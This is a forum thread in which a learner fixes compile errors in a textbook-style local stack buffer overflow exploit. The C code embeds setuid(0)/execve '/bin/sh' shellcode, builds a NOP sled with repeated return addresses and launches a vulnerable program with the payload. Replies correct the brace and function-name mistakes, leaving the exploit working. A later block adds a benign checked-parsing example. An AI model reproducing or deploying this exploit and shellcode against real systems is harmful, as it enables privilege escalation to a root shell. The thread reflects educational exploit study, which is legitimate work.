C Exploit Errors

Post by Israel on Thu Jun 11, 2009 5:50 am

Been reading a good book on writing exploits. Maybe I've been up too long, but I can't seem to find the last errors in this code. Here's what I got:
Code:
// exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] = //setuid(0) & Aleph1's shellcode
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the esp value (only works locally)
unsigned long get_sp(void) {
   __asm__(".intel_syntax noprefix\n mov eax, esp");
}

int main(int argc, char *argv[1]) { //main function
int i, offset = 0;          //used to count/subtract later   
long esp, ret, *addr_ptr;          //used to save addresses
char *buffer, *ptr;          //two strings: buffer, ptr
int size = 500;             //default buffer size

esp = get_sp();             //get local esp value
if(argc > 1) size = atoi(argv[1]);  //if 1 argument, store to size
if(argc > 2) offset = atoi(argv[2]);//if 2 argument, store offset
if(argc > 3) esp = strou1(argv[3],NULL,0); //used for remote exploits
ret = esp - offset;          //calc default value of return
// print directions for use
fprintf(stderr,"Useage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf(stderr, "ESP:0x%x  Offset:0x%x  Return:0x%x\n",esp,offset,ret);

buffer = (char *)malloc(size);      //allocate buffer on heap
ptr = buffer;                       //temp pointer,set to location of buffer
addr_ptr = (long *) ptr;       //temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for(i=0; i < size; i+=4){            //increment of 4 bytes for addr
    *(addr_ptr++) = ret;       //use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for(i=0; i < size/2; i++){       //notice we only write up to half the size
   buffer[i] = '\x90';       //place NOPs in the first half of buffer
}

// Now place shellcode
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++)//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0
//Now, call the vulerable program with buffer as second arguement.
exec1("./meet", "meet", "Mr.",buffer,0); //the list of args is ended w/0
printf("%s\n",buffer);          //used for remote exploits
//free up the heap
free(buffer);             //play nicely
return   0;                  //exit gracefully
}


Here are the errors from gcc:
Code:
# gcc ./exploit.c -o exploit
./exploit.c:50: error: 'size' undeclared here (not in a function)
./exploit.c:50: warning: data definition has no type or storage class
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before 'buffer'
./exploit.c:52: error: expected declaration specifiers or '...' before numeric constant
./exploit.c:52: warning: data definition has no type or storage class
./exploit.c:53: error: expected declaration specifiers or '...' before string constant
./exploit.c:53: error: expected declaration specifiers or '...' before 'buffer'
./exploit.c:53: warning: data definition has no type or storage class
./exploit.c:53: error: conflicting types for 'printf'
./exploit.c:53: note: a parameter list with an ellipsis can't match an empty parameter name list declaration
./exploit.c:55: warning: data definition has no type or storage class
./exploit.c:55: warning: parameter names (without types) in function declaration
./exploit.c:55: error: conflicting types for 'free'
./exploit.c:56: error: expected identifier or '(' before 'return'
./exploit.c:57: error: expected identifier or '(' before '}' token


Re: C Exploit Errors

Post by mischief on Thu Jun 11, 2009 8:13 am

You use but never define 'size'. The error message is quite clear about that. :\


Re: C Exploit Errors

Post by Israel on Fri Jun 12, 2009 12:15 am

Didn't I already do that in the main function?

Line 20:
Code:
int size = 500;             //default buffer size


Re: C Exploit Errors

Post by mischief on Fri Jun 12, 2009 7:30 am

Code:
for(i=0; i < strlen(shellcode); i++)//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0


I think you've added/forgotten braces someplace, possibly after the for statement I quoted. What's happening is you have a problem with scope. You're probably closing main()'s scope with a missing/added brace somewhere.


Re: C Exploit Errors

Post by xcurious on Fri Jun 12, 2009 8:06 am

You are missing an opening brace after your for statement, and it also seems you need to define strou1 and exec1 before you can use them as functions.


Re: C Exploit Errors

Post by Israel on Fri Jun 12, 2009 9:29 am

Ok, first I found that bracket I was missing. Then for some reason I got all these assembly errors even though the same exact code ran perfectly in another program. Changed the assembly from nasm to AT&T syntax and that was fixed. Then after some googling I discovered the strou1 and exec1 should have been stroul and execl. I had mistaken the L's in my text for ones. I found adding "#include <unistd.h>" to the code would take care of the errors with execl. Now all I have is this:

Code:
# gcc exploit.c -o exploit
/tmp/ccjxgLfn.o: In function `main':
exploit.c:(.text+0x98): undefined reference to `stroul'
collect2: ld returned 1 exit status


Here's the new code:
Code:
// exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] = //setuid(0) & Aleph1's shellcode
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the esp value (only works locally)
unsigned long get_sp(void) {
//   __asm__(".intel_syntax noprefix\n mov eax, esp");
   __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[1]) { //main function
int i, offset = 0;          //used to count/subtract later   
long esp, ret, *addr_ptr;          //used to save addresses
char *buffer, *ptr;          //two strings: buffer, ptr
int size = 500;             //default buffer size

esp = get_sp();             //get local esp value
if(argc > 1) size = atoi(argv[1]);  //if 1 argument, store to size
if(argc > 2) offset = atoi(argv[2]);//if 2 argument, store offset
if(argc > 3) esp = stroul(argv[3],NULL,0); //used for remote exploits
ret = esp - offset;          //calc default value of return
// print directions for use
fprintf(stderr,"Useage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf(stderr, "ESP:0x%x  Offset:0x%x  Return:0x%x\n",esp,offset,ret);

buffer = (char *)malloc(size);      //allocate buffer on heap
ptr = buffer;                       //temp pointer,set to location of buffer
addr_ptr = (long *) ptr;       //temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for(i=0; i < size; i+=4){            //increment of 4 bytes for addr
    *(addr_ptr++) = ret;       //use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for(i=0; i < size/2; i++){       //notice we only write up to half the size
   buffer[i] = '\x90';       //place NOPs in the first half of buffer
}

// Now place shellcode
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++){//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0
//Now, call the vulerable program with buffer as second arguement.
execl("./meet", "meet", "Mr.",buffer,0); //the list of args is ended w/0
printf("%s\n",buffer);          //used for remote exploits
//free up the heap
free(buffer);             //play nicely
return   0;                  //exit gracefully
}


Re: C Exploit Errors

Post by mischief on Fri Jun 12, 2009 10:35 am

There is no such function as stroul. :p Try 'strtoul'.
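A checked way to read the address argument that the thread's code hands to `strtoul(argv[3], NULL, 0)`. This is an added example, not code from the posts or the book they cite; `parse_addr`, `parses_to` and `rejects` are names chosen here.

```c
/* Added example (not from the posts or the book): a checked replacement for
 * the thread's `esp = strtoul(argv[3], NULL, 0);`. strtoul returns 0 for
 * garbage, wraps "-1" to ULONG_MAX and ignores trailing junk, so a mistyped
 * address is silently accepted; parse_addr() refuses all of those. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Returns 1 and stores the value in *out on success, 0 on any failure.
 * Base 0 keeps strtoul's forms: "0x..." hex, "0..." octal, else decimal. */
int parse_addr(const char *s, unsigned long *out)
{
    char *end;
    unsigned long v;

    if (s == NULL)
        return 0;
    while (isspace((unsigned char)*s))
        s++;                            /* strtoul skips this too; be explicit */
    if (*s == '\0' || *s == '-')
        return 0;                       /* empty input, or "-1" (would wrap) */

    errno = 0;
    v = strtoul(s, &end, 0);
    if (errno == ERANGE)
        return 0;                       /* value does not fit in unsigned long */
    if (end == s || *end != '\0')
        return 0;                       /* no digits at all, or trailing junk */

    *out = v;
    return 1;
}

/* Small helpers (names chosen here) so results can be checked as values. */
int parses_to(const char *s, unsigned long want)
{
    unsigned long v;
    return parse_addr(s, &v) && v == want;
}

int rejects(const char *s)
{
    unsigned long v;
    return !parse_addr(s, &v);
}
```

Calling `parse_addr(argv[3], &esp)` and bailing out on 0 is enough to turn a mistyped address into a usage error instead of a silent 0.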


Re: C Exploit Errors

Post by Israel on Fri Jun 12, 2009 12:04 pm

You're right. I checked the book, must have made a late night typo. Still, my opinion of the writing has changed now. They didn't include any of these:

Code:
#include <stdlib.h> // gave warnings without
#include <string.h> // gave warnings without
#include <unistd.h> // would not compile without


Thanks for the help! :)


Re: C Exploit Errors

Post by mischief on Fri Jun 12, 2009 1:50 pm

They were probably using a different compiler, or possibly different compilation flags, or headers that included each other later on. A whole host of differences could occur :p


Re: C Exploit Errors

Post by Israel on Sat Jun 13, 2009 12:52 am

Used the same flags and same compiler (maybe a newer version though...) Oh well, it made me think :)
Last edited by Israel on Sun Jun 14, 2009 7:56 am, edited 1 time in total.